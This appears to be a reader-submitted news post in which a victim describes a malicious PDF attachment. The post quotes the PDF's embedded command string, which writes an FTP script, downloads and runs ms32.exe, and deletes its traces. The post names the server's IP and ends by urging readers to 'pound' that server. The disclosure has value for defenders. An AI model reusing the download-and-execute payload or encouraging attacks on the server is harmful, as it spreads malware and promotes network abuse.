hoggoth writes: The recent outbreak of the 'Peachy' virus showed that PDFs can carry dangerous content. All of the news outlets are repeating Adobe's statement that only the full Acrobat suite can activate the virus, that the free Acrobat Reader is immune. However as a victim of a PDF carried virus I can tell you it's not true. This morning I got an email from a financial services firm I have an account with to an email address I set up just for that financial services firm. This led me to stupidly trust the email that contained a PDF attachment. When I clicked on it a window popped up and went away; very suspicious behavior. So I looked closer at the PDF file and found that it contained a mailto: that put some DOS commandline instructions in a file and executed them, which contacted a server, downloaded an executable, and ran it. The meat of the offending part is this: 14 0 obj7&@echo binary>>7&@echo get
/ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\" \"&\" "con.cmd)/S/URI>>
This calls cmd.exe with a long command that turns off your firewall, FTP's into the offending site, downloads a rogue version of ms32.exe, and runs it.
The virus installed a number of files to my computer and modified the startup to run them. I *think* I got rid of it all, although one can never be sure today with rootkits and all.
I googled all over, and I think this is 'breaking news'. Every outlet is still saying Acrobat Reader is safe.
Entities to Hate:
The virus server at 184.108.40.206
Financial services institutions that sell your private email address to marketers.
Adobe for allowing PDFs to execute cmd.com.
Adobe for lying about Acrobat Reader being safe.
Microsoft for their entire insecure operating system. Come on, outside data is allowed to run and TURN OFF THE FIREWALL?!
Please feel free to pound that FTP server's IP address with all the hate you can muster.